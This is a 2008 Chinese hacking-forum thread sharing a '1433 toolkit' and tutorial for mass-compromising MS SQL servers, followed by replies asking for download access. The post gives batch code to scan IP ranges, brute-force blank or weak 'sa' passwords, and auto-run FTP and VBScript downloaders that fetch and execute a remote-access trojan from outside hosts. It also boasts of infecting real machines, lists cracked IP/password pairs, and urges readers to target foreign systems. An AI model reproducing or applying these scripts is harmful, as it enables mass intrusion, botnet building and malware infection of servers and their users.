岁月联盟 - 技术社区 - BBS.SYUE.COM » [ Hacking tools Download ] 黑客工具下载 » 1433全套工具

明少 发表于 2008-3-31 09:55

1433全套工具

[attach]7460[/attach]
工具：1、带ftp服务器的鸽子
      2、1433大杀器（原创）
      3、批量溢出工具
      4、命令行下的SQL连接器

其实自动原理很简单——自动扫描1433弱口令，然后自动上传。
自动扫描1433弱口令的工具目前市面上有下载，特别感谢D盘格式化给予的技术支持！
本教程的主要技术焦点在于自动上传！

ok,菜菜们，2000 & 2003的机子在向我们招手！let's begin!!

打开1433大杀器
为了方便菜鸟，1433大杀器的代码已经基本全部实现傻瓜自动化。

填入开始、结束IP
ok,就扫222.8X.XXX.XXX这个B段ip吧

回车，开始扫描，

扫描的功夫给大家讲下代码原理，高手跳过！

echo=================================================================================
set/p startip=开始IP:
set /p endip=结束IP:
echo=================================================================================
S syn %startip% %endip% 1433 800 /save
for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>s.txt

变量startip和endip是s扫描器的
S syn %startip% %endip% 1433 800 /save
开始和结束ip

for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>s.txt

经典的循环语句！第一句是指将result.txt中的“—”符号作为参数，空格作为分割符号，去除内容，同理，二三两行就是以p和s为参数，结果整理到s.txt

纯代码实现了S扫描器的扫描结果整理，不需要去记事本里“替换”了！


扫描中，先暂停

先扫到这里把




整理后的s.txt是


222.81.8.51
222.81.8.19
222.81.8.51
222.81.8.19
222.81.32.229
222.81.34.6
222.81.35.148
222.81.35.161



格式了，
整理完毕后就自动开始猜解sa弱口令。

这里扫描内核是x-scan.
使用x-scan，一方面可以打开报告，方便菜鸟，还有另一方面，尊重D盘格式化的原版创意，前天产生些误会，向他致以深切的歉意！他的技术与人品是过硬的！


先暂停，当然，你可以在3389上开多个扫描

好了，猜解完毕!



时间关系先扫这么多，有耐心，或者扫一夜。。。回有相当多。。。。

下面是本教程的关键，自动上传。

如果你习惯cmd界面，你可以用CMD版通用批量溢出利用工具
当然，也可以用gui界面的。。


在扫描完毕的log 文件夹内有个s_txt_report_hostlist.txt文件  
他记录了扫描完毕的结果，
然后，自己写一个上传木马的文件 up.txt
内容可以是

echo open 59.13.245.12 > cc1.txt
echo qqq>> cc1.txt
echo zzz>> cc1.txt
echo binary >> cc1.txt
echo get boot3.exe >> cc1.txt
echo bye >> cc1.txt
ftp -s:cc1.txt
boot3.exe
boot3.exe


boot3.exe是马儿

也可以是

echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe
echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>dl.vbe
echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe
echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbe
cscript dl.vbe [url]http://xxxx.xxx.xx.xxx/js/update.exe[/url] update.exe
update.exe

这个大家都明白，前者是FTP后者是http上传方式




好了，还有一个工具是cmd下的sql连接器，sqlrcmd
我会打包给大家的

sqlrcmd的命令是 sqlrcmd xxx.xxx.xx.xx sa password或sqlrcmd xxx.xxx.xx.xx sa ""
""指空口令







好一样道理，把ip地址复制到批量溢出利用工具下
格式看我操作
111.exe %1 sa ""<up.txt

即sql连接后执行up.txt的内容

这样实现批量连接，上传，就这么简单

开始！
ftp 反映激烈！！！！


好卡！！
这就是另类被自己肉鸡ddos吧！·#￥%…………—*


申明：本人这次是为做教程而抓国内肉鸡，结束后回全部释放

希望大家在实验时拿国外的！！！

这个就是下载完毕的。。。。


有的密码不是空的，要再次上传！


看下成果！这里是刚刚上线的。。。贵州的，

前面我测试过一次了，只要是222.8XX.XX>X开头的都是的。。。


由于鸽子的ftp服务起不是很好，所以有时回掉线什么的。。。。有条件可以安装ser-u!










卡死了，让他慢慢上传吧，先暂停下

个别的一会儿就出现Connect 58.50.60.148 Failed, Press Any Key to Exit...
还有的是
SQLCMD>Can'nt Execute Command, Press Any Key to Exit...
ftp: connect :未知错误号
ftp: connect :套接字未连接
ftp: bind :缓冲区空间不受支持

那说明这个机子不能执行命令，要丢弃


还有就是由于他的密码不是""空的，

那么就是sa的拉

再来一次以sa为密码的批量上传

再看操作~~

这些连不上的就不是sa密码





及个别以123456为密码的就自己手动上传吧。。。






再次申明：本人这次是为做教程而抓国内肉鸡，结束后回全部释放

希望大家在实验时拿国外的！！！

这些都是刚刚的成果！特别是2000的机子！
想扫135？就拿这些开始！



菜菜门也要适应cmd下操作，一样道理

D:\1433自动\通用批量溢出利用工具CMD版>cor
      *************************************************************
      *           通用溢出利用工具 V1.0 commover.exe              *
      *            Welcome To EvilOctalSecurityTeam               *
      *                [url]http://www.eviloctal.com[/url]                   *
      *design:SunLion[EST]                [url]http://sunlion.126.com[/url]  *
      *Thanks:无锋之刃[EST]      风泽[EST] [url]http://www.blacksky.cn[/url] *
      *************************************************************
Usage:  cor      [head] file after exp
         head------EXP的前缀参数(多个参数需要用双引号刮起来)
         file------保存攻击IP的文件的全名(.txt)
         after------EXP的后缀参数(多个参数需要用双引号刮起来)
         exp------exp的文件全名(.exe)
有前缀参数:cor 0 file.txt "1234 192.168.0.253" ms04011.exe
无前缀参数:cor file.txt "1433 192.168.0.253 1234" sqlhello.exe

这里的命令就是 cor ip.txt "" 1.bat

懂了波？也是批量的哦

有菜菜要问了，你这个要用不同的密码来多次上传，没有完全实现自动化啊！


这个问题我也考虑了两个星期，思路是
·························
把扫描出的报告文件——整理出对应用户名和密码
然后批量连接
·························


功夫不负有心人，我请教过好多人都曰“这是不可能de”之后
自己设计成功！！



下面，我会说下原理
将x-scan替换为h-scan,
因为h-scan扫出的报告格式为


61.180.66.178 sa “”
61.180.240.99@mssqlscan#Cracked account:  sa/sa
61.180.240.54@mssqlscan#Cracked account:  sa/sa
61.180.240.99@mssqlscan#Cracked account:  sa/sa
61.180.240.99@mssqlscan#Cracked account:  admin/admin
61.180.93.98@mssqlscan#Cracked account:  sa/[null]
61.180.69.7@mssqlscan#Cracked account:  admin/admin
61.180.240.54@mssqlscan#Cracked account:  admin/admin
61.180.240.99@mssqlscan#Cracked account:  admin/admin
61.181.159.147@mssqlscan#Cracked account:  sa/sa
61.183.85.107@mssqlscan#Cracked account:  sa/[null]
61.183.99.14@mssqlscan#Cracked account:  sa/[null]
61.183.125.190@mssqlscan#Cracked account:  sa/1234
61.183.220.50@mssqlscan#Cracked account:  sa/[null]


用几句批处理代码直接整理为

58.50.87.59 sa ""
58.50.60.148 sa sa
58.50.128.15 sa ""
58.50.207.55 sa ""
58.50.134.69 sa ""
58.50.108.93 sa ""
58.50.245.249 sa ""
58.50.61.217 sa ""


ok，接下来重复通用溢出的过程，只不过1.bat要改成111.exe %1 <nc.txt


我就不测试了

这样就实现了真正的全自动。

将工具整合完毕后，实现扫1433端口——过滤结果——扫1433弱口令——整理格式为58.50.87.59 sa ""——自动上传，中马.

这个工具实现自动中马可谓“一条龙“,

我测试过在3389上扫一夜B段的ip地址，最多上线172台，其中100台左右是2000和2003的服务器。。。

可以折射出国内网络安全意识是多么薄弱！
扫日本韩国的机子就很少，印度的很多！！！




后来朽木跟我说你这个工具是“疯掉了”，简直可怕，我考虑了一下，认为的确危害较大，
因为可以通过屏幕监控看到很多2000的机子是作为公司销售的服务器，有的是小区上网的交换服务器。。。
一旦操作不当，结果轻则是小区上百居民同时断网，重则上千资产不到帐。。。。

出于安全考虑，暂时不把自动传马的代码公布，只公布2/3代码，见谅！

但是，我已经把所有思路阐述了，懂批处理的黑友刹那间就可以写出完整代码，

实现扫1433端口——过滤结果——扫1433弱口令——整理格式为58.50.87.59 sa ""——自动上传，中马

着就是思路~~

本教程另付一个简单批处理教程，希望各位菜菜真正蜕变为一个编程小子，而不是只懂得用工具的小黑。
=================================================================
学技术，先学做人。
你手里的345位的庞大肉鸡群，不是刷三钻的工具！
他是一股隐形的力量！
一支庞大的军队！

慎重！

=================================================================

ingale 发表于 2008-3-31 10:32

顶! ! ! ! ! !
下下来试试
沙发
[(:biggrin:)] [(:biggrin:)]

ingale 发表于 2008-3-31 10:34

没权限?
难道要我渗透?
   我不会啊

明少 发表于 2008-3-31 16:14

40权限就OK

明少 发表于 2008-3-31 16:14

没哪出来买钱就不错了！~！~嘿嘿！~

萧玉轩 发表于 2008-4-1 22:23

看啊看你

nrhwffgwffg 发表于 2008-4-2 11:34

[(:huffy:)]

katkat 发表于 2008-4-2 21:25

原来没权限，唉。。。。。[(:huffy:)]

明少 发表于 2008-4-4 19:13

1433的工具我想  在网上就没有下的！~！~ 有的都是一些VIP会员才能下载的或都就是木马！~
     在这儿只要40的权限就可以下载~！~
                                                                            希望各位多多支持岁月

taoqixfz 发表于 2008-4-4 20:25

原来是这么回事啊

taoqixfz 发表于 2008-4-4 20:26

权限怎么得啊?

lovexrwf 发表于 2008-4-9 21:54

5454646546546sdfsadf[(:huffy:)] [(:huffy:)] [(:huffy:)]

gaoqun2 发表于 2008-4-10 07:52

非常强大,非常实用  我顶啊

cxz7411 发表于 2008-4-16 14:30

看起来不错。 的加一个试试。

逍遥神猪 发表于 2008-4-17 01:13

没权限?
难道要我渗透?

2404563 发表于 2008-4-17 13:53

我晕晕！~我赚我钱哪~！！`交了钱！~下载不了！~

mgsky 发表于 2008-4-20 02:03

40的权限啊！！！！

yyakk 发表于 2008-4-20 02:19

一定要看看

legnairt 发表于 2008-4-21 11:41

ewqeqw

ewqewq

ts250 发表于 2008-4-24 22:46

654564564

654654654654

明少 发表于 2008-4-30 23:40

[(:titter:)] [(:titter:)] [(:titter:)]

zhangya9182 发表于 2008-5-5 15:36

好东西呀

[(:biggrin:)] 好东西

6342781 发表于 2008-5-10 00:28

dddddddddddddddddddddddddddddddddd

lfczyh 发表于 2008-5-16 23:46

dddddddddddddddddddddddddddddddddd

lch1987 发表于 2008-5-18 00:22

[(:smile:)] [(:smile:)] [(:smile:)] [(:smile:)] [(:smile:)] [(:smile:)]

lfczyh 发表于 2008-5-20 10:32

dddddddddddddddddddddddddddddddddddddddddddddddddd

hwj1026 发表于 2008-5-22 15:35

厉害了，支持了先

明少 发表于 2008-5-23 17:55

看了很多人都下载不了！~！
~ 我把权限改了！~！~ 想要的朋友去下吧[(:tongue:)] [(:tongue:)]

lywy3000 发表于 2008-5-30 19:55

非常好的工具，不知道能不能下载

yl2365667 发表于 2008-5-31 11:23

[(:mad:)] [(:mad:)] [(:mad:)] [(:mad:)]

查看完整版本: 1433全套工具